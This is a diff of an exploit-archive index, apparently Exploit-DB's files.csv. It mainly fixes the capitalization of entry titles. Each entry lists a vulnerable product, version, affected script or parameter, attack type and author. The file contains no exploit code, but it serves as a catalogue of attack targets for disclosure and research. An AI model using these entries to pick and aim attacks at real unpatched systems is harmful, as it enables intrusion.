Overflow",2006-08-28,XSec,windows,remote,0 28439,platforms/php/webapps/28439.txt,"HLstats 1.34 - hlstats.php Cross-Site Scripting",2006-08-29,kefka,php,webapps,0 @@ -25494,7 +25495,7 @@ id,file,description,date,author,platform,type,port 28441,platforms/php/webapps/28441.txt,"IwebNegar 1.1 - comments.php SQL Injection",2006-08-30,Hessam-x,php,webapps,0 28442,platforms/php/webapps/28442.txt,"LinksCaffe 2.0/3.0 - Authentication Bypass",2006-07-25,HoangYenXinhDep,php,webapps,0 28443,platforms/asp/webapps/28443.html,"Digiappz Freekot 1.01 - ASP SQL Injection",2006-08-30,FarhadKey,asp,webapps,0 -28444,platforms/php/webapps/28444.txt,"AlstraSoft Template Seller - Config[Template_Path] Multiple Remote File Inclusion",2006-08-30,night_warrior771,php,webapps,0 +28444,platforms/php/webapps/28444.txt,"Alstrasoft Template Seller - Config[Template_Path] Multiple Remote File Inclusion",2006-08-30,night_warrior771,php,webapps,0 28445,platforms/php/webapps/28445.txt,"MyBulletinBoard 1.x - Functions_Post.php Cross-Site Scripting",2006-08-30,imei,php,webapps,0 28446,platforms/php/webapps/28446.txt,"HLstats 1.34 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-08-30,MC.Iglo,php,webapps,0 28447,platforms/php/webapps/28447.php,"osCommerce 2.1/2.2 - product_info.php SQL Injection",2006-08-30,"James Bercegay",php,webapps,0 @@ -25502,24 +25503,24 @@ id,file,description,date,author,platform,type,port 28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - admin/orders_status.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - admin/products_attributes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0 28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 -28464,platforms/php/webapps/28464.txt,"VisualShapers EzContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 -28465,platforms/php/webapps/28465.txt,"VisualShapers EzContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 +28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0 +28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0 28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0 28467,platforms/php/webapps/28467.txt,"ExBB 1.9.1 - Home_Path Parameter Multiple Remote File Inclusion",2006-08-31,Matdhule,php,webapps,0 28468,platforms/php/webapps/28468.txt,"YACS 6.6.1 - Multiple Remote File Inclusion",2006-09-01,MATASANOS,php,webapps,0 28450,platforms/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 -28452,platforms/php/webapps/28452.txt,"Wordpress Lazy SEO plugin 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 -28453,platforms/php/webapps/28453.txt,"ezContents 2.0.3 - event_list.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28454,platforms/php/webapps/28454.txt,"ezContents 2.0.3 - calendar.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28455,platforms/php/webapps/28455.txt,"ezContents 2.0. - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28456,platforms/php/webapps/28456.txt,"ezContents 2.0.3 - showguestbook.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28457,platforms/php/webapps/28457.txt,"ezContents 2.0.3 - showlinks.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28458,platforms/php/webapps/28458.txt,"ezContents 2.0.3 - shownews.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28459,platforms/php/webapps/28459.txt,"ezContents 2.0.3 - showpoll.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28460,platforms/php/webapps/28460.txt,"ezContents 2.0.3 - review_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28461,platforms/php/webapps/28461.txt,"ezContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 -28462,platforms/php/webapps/28462.txt,"ezContents 2.0.3 - toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28452,platforms/php/webapps/28452.txt,"WordPress Lazy SEO plugin 1.1.9 - Arbitrary File Upload",2013-09-22,"Ashiyane Digital Security Team",php,webapps,0 +28453,platforms/php/webapps/28453.txt,"EZContents 2.0.3 - event_list.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28454,platforms/php/webapps/28454.txt,"EZContents 2.0.3 - calendar.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28455,platforms/php/webapps/28455.txt,"EZContents 2.0. - gallery_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28456,platforms/php/webapps/28456.txt,"EZContents 2.0.3 - showguestbook.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28457,platforms/php/webapps/28457.txt,"EZContents 2.0.3 - showlinks.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28458,platforms/php/webapps/28458.txt,"EZContents 2.0.3 - shownews.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28459,platforms/php/webapps/28459.txt,"EZContents 2.0.3 - showpoll.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28460,platforms/php/webapps/28460.txt,"EZContents 2.0.3 - review_summary.php GLOBALS[admin_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28461,platforms/php/webapps/28461.txt,"EZContents 2.0.3 - search.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 +28462,platforms/php/webapps/28462.txt,"EZContents 2.0.3 - toprated.php GLOBALS[language_home] Parameter Remote File Inclusion",2006-08-30,DarkFig,php,webapps,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos,0 28470,platforms/php/webapps/28470.txt,"VBZoom 1.11 - profile.php Cross-Site Scripting",2006-09-01,Crack_MaN,php,webapps,0 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps,0 @@ -25531,8 +25532,8 @@ id,file,description,date,author,platform,type,port 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0 28483,platforms/php/remote/28483.rb,"GLPI - install.php Remote Command Execution",2013-09-23,Metasploit,php,remote,80 28484,platforms/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution",2013-09-23,Metasploit,hardware,remote,0 -28485,platforms/php/webapps/28485.txt,"Wordpress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 -28486,platforms/php/webapps/28486.txt,"In-Portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 +28485,platforms/php/webapps/28485.txt,"WordPress NOSpamPTI Plugin - Blind SQL Injection",2013-09-23,"Alexandro Silva",php,webapps,0 +28486,platforms/php/webapps/28486.txt,"In-portal In-Link 2.3.4 - ADODB_DIR.php Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 28487,platforms/php/webapps/28487.txt,"PHP-Nuke MyHeadlines 4.3.1 Module - Cross-Site Scripting",2006-09-04,"Thomas Pollet",php,webapps,0 28488,platforms/php/webapps/28488.php,"PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion",2006-09-04,Kacper,php,webapps,0 28489,platforms/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote,0 @@ -25550,7 +25551,7 @@ id,file,description,date,author,platform,type,port 28501,platforms/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,multiple,remote,0 28502,platforms/php/webapps/28502.txt,"TextAds - delete.php id Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 28503,platforms/php/webapps/28503.txt,"TextAds - error.php error Parameter Cross-Site Scripting",2006-09-09,s3rv3r_hack3r,php,webapps,0 -28504,platforms/php/local/28504.php,"PHP 3-5 - Ini_Restore() Safe_Mode and Open_Basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 +28504,platforms/php/local/28504.php,"PHP 3-5 - Ini_Restore() Safe_mode and open_basedir Restriction Bypass",2006-09-09,"Maksymilian Arciemowicz",php,local,0 28505,platforms/php/webapps/28505.txt,"PHProg 1.0 - Multiple Input Validation Vulnerabilities",2006-09-11,cdg393,php,webapps,0 29215,platforms/php/webapps/29215.txt,"FreeQBoard 1.0/1.1 - QB_Path Parameter Multiple Remote File Inclusion",2006-12-27,Shell,php,webapps,0 28507,platforms/aix/local/28507.sh,"IBM AIX 6.1 / 7.1 - Privilege Escalation",2013-09-24,"Kristian Erik Hermansen",aix,local,0 @@ -25566,27 +25567,27 @@ id,file,description,date,author,platform,type,port 28518,platforms/php/webapps/28518.txt,"IDevSpot iSupport 1.8 - 'index.php' Remote File Inclusion",2006-09-12,s3rv3r_hack3r,php,webapps,0 28519,platforms/php/webapps/28519.txt,"WM-News 0.5 - print.php Local File Inclusion",2006-09-12,"Daftrix Security",php,webapps,0 28520,platforms/php/webapps/28520.txt,"Ractive Popper 1.41 - Childwindow.Inc.php Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 -28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 - .FLC Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 -28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn GuestBook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn GuestBook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn GuestBook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn GuestBook 1.x - includes/admin.inc.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn GuestBook 1.x - help.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn GuestBook 1.x - smile.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn GuestBook 1.x - help/en/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn GuestBook 1.x - help/de/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn GuestBook 1.x - entry.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn GuestBook 1.x - admin/preview.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn GuestBook 1.x - admin/log.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn GuestBook 1.x - admin/index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn GuestBook 1.x - admin/config.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 -28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn GuestBook 1.x - admin/admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 - '.FLC' Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 +28522,platforms/php/webapps/28522.txt,"Telekorn Signkorn Guestbook 1.x - 'index.php' dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28523,platforms/php/webapps/28523.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.gb.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28524,platforms/php/webapps/28524.txt,"Telekorn Signkorn Guestbook 1.x - includes/functions.admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28525,platforms/php/webapps/28525.txt,"Telekorn Signkorn Guestbook 1.x - includes/admin.inc.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28526,platforms/php/webapps/28526.txt,"Telekorn Signkorn Guestbook 1.x - help.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28527,platforms/php/webapps/28527.txt,"Telekorn Signkorn Guestbook 1.x - smile.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28528,platforms/php/webapps/28528.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28529,platforms/php/webapps/28529.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28530,platforms/php/webapps/28530.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28531,platforms/php/webapps/28531.txt,"Telekorn Signkorn Guestbook 1.x - help/en/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28532,platforms/php/webapps/28532.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp0.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28533,platforms/php/webapps/28533.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp1.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28534,platforms/php/webapps/28534.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp2.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28535,platforms/php/webapps/28535.txt,"Telekorn Signkorn Guestbook 1.x - help/de/adminhelp3.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28536,platforms/php/webapps/28536.txt,"Telekorn Signkorn Guestbook 1.x - entry.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28537,platforms/php/webapps/28537.txt,"Telekorn Signkorn Guestbook 1.x - admin/preview.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28538,platforms/php/webapps/28538.txt,"Telekorn Signkorn Guestbook 1.x - admin/log.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28539,platforms/php/webapps/28539.txt,"Telekorn Signkorn Guestbook 1.x - admin/index.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28540,platforms/php/webapps/28540.txt,"Telekorn Signkorn Guestbook 1.x - admin/config.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 +28541,platforms/php/webapps/28541.txt,"Telekorn Signkorn Guestbook 1.x - admin/admin.php dir_path Parameter Remote File Inclusion",2006-09-12,ThE_LeO,php,webapps,0 28542,platforms/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device - Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",multiple,dos,0 28543,platforms/php/webapps/28543.txt,"ForumJBC 4.0 - Haut.php Cross-Site Scripting",2006-09-13,ThE__LeO,php,webapps,0 28544,platforms/php/webapps/28544.txt,"K2News Management 1.3 - Ratings.php Cross-Site Scripting",2006-09-13,meto5757,php,webapps,0 @@ -25622,9 +25623,9 @@ id,file,description,date,author,platform,type,port 28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php' username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 -28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 +28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 -28578,platforms/osx/dos/28578.txt,"Apple Mac OSX 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 +28578,platforms/osx/dos/28578.txt,"Apple Mac OS X 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 28579,platforms/php/webapps/28579.txt,"MyBulletinBoard 1.x - 'index.php' Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 @@ -25652,7 +25653,7 @@ id,file,description,date,author,platform,type,port 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 - 'index.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - search.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 @@ -25687,13 +25688,13 @@ id,file,description,date,author,platform,type,port 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,linux,remote,0 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 -28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 +28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File manipulation",2006-09-21,"Patrick Webster",windows,remote,0 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 -28643,platforms/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 +28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 -28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - Filemanager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 +28647,platforms/php/webapps/28647.txt,"PLESK 7.5/7.6 - FileManager.php Directory Traversal",2006-09-22,GuanYu,php,webapps,0 28648,platforms/freebsd/dos/28648.c,"FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities",2006-09-23,"Adriano Lima",freebsd,dos,0 28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0 28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos,0 @@ -25709,8 +25710,8 @@ id,file,description,date,author,platform,type,port 28656,platforms/php/webapps/28656.txt,"SimpleRisk 20130915-01 - Multiple Vulnerabilities",2013-09-30,"Ryan Dewhurst",php,webapps,80 28657,platforms/linux/local/28657.c,"glibc and eglibc 2.5/2.7/2.13 - Buffer Overflow",2013-09-30,"Hector Marco and Ismael Ripoll",linux,local,0 28661,platforms/php/webapps/28661.txt,"ToendaCMS 1.0.4 - Media.php Directory Traversal",2006-09-24,MoHaJaLi,php,webapps,0 -28662,platforms/php/webapps/28662.txt,"PhotoStore - details.php gid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 -28663,platforms/php/webapps/28663.txt,"PhotoStore - view_photog.php photogid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 +28662,platforms/php/webapps/28662.txt,"Photostore - details.php gid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 +28663,platforms/php/webapps/28663.txt,"Photostore - view_photog.php photogid Parameter Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28664,platforms/php/webapps/28664.txt,"Opial AV Download Management 1.0 - 'index.php' Cross-Site Scripting",2006-09-25,meto5757,php,webapps,0 28665,platforms/php/webapps/28665.txt,"WWWThreads 5.4 - Cat Parameter Multiple Cross-Site Scripting Vulnerabilities",2006-09-25,Root3r_H3ll,php,webapps,0 28666,platforms/multiple/dos/28666.txt,"Call of Duty Server 4.1.x - Callvote Map Command Remote Buffer Overflow",2006-09-25,"Luigi Auriemma",multiple,dos,0 @@ -25756,7 +25757,7 @@ id,file,description,date,author,platform,type,port 29275,platforms/cgi/webapps/29275.txt,"Netwin SurgeFTP 2.3a1 - SurgeFTPMGR.cgi Multiple Input Validation Vulnerabilities",2006-12-11,"Umesh Wanve",cgi,webapps,0 29276,platforms/asp/webapps/29276.txt,"Lotfian Request For Travel 1.0 - ProductDetails.asp SQL Injection",2006-12-11,ajann,asp,webapps,0 28728,platforms/php/webapps/28728.txt,"Geotarget - script.php Remote File Inclusion",2006-09-29,"RaVeR shi mozi",php,webapps,0 -28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR WebAccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 +28708,platforms/php/webapps/28708.txt,"elproLOG MONITOR Webaccess 2.1 - Multiple Vulnerabilities",2013-10-04,Vulnerability-Lab,php,webapps,80 28709,platforms/php/webapps/28709.txt,"FlashChat 6.0.2-6.0.8 - Arbitrary File Upload",2013-10-04,x-hayben21,php,webapps,80 28710,platforms/osx/remote/28710.txt,"Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",osx,remote,0 28711,platforms/php/webapps/28711.txt,"PHP Invoice 2.2 - home.php Cross-Site Scripting",2006-09-26,meto5757,php,webapps,0 @@ -25767,7 +25768,7 @@ id,file,description,date,author,platform,type,port 28716,platforms/php/webapps/28716.txt,"MKPortal 1.0/1.1 - PMPopup.php Cross-Site Scripting",2006-09-27,HanowarS,php,webapps,0 29279,platforms/php/webapps/29279.txt,"Olat CMS 7.8.0.1 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 28718,platforms/freebsd/local/28718.c,"FreeBSD 9.0 - Intel SYSRET Kernel Privilege Escalation",2013-10-04,CurcolHekerLink,freebsd,local,0 -28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla ECommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 +28719,platforms/php/webapps/28719.txt,"VirtueMart Joomla eCommerce Edition 1.0.11 - Multiple Input Validation Vulnerabilities",2006-09-27,"Adrian Castro",php,webapps,0 28720,platforms/php/webapps/28720.txt,"Web//News 1.4 - parser.php Remote File Inclusion",2006-09-27,ThE-WoLf-KsA,php,webapps,0 28721,platforms/php/webapps/28721.txt,"Red Mombin 0.7 - 'index.php' Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 28722,platforms/php/webapps/28722.txt,"Red Mombin 0.7 - process_login.php Unspecified Cross-Site Scripting",2006-09-22,"Armorize Technologies",php,webapps,0 @@ -25805,14 +25806,14 @@ id,file,description,date,author,platform,type,port 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 -28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - Functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 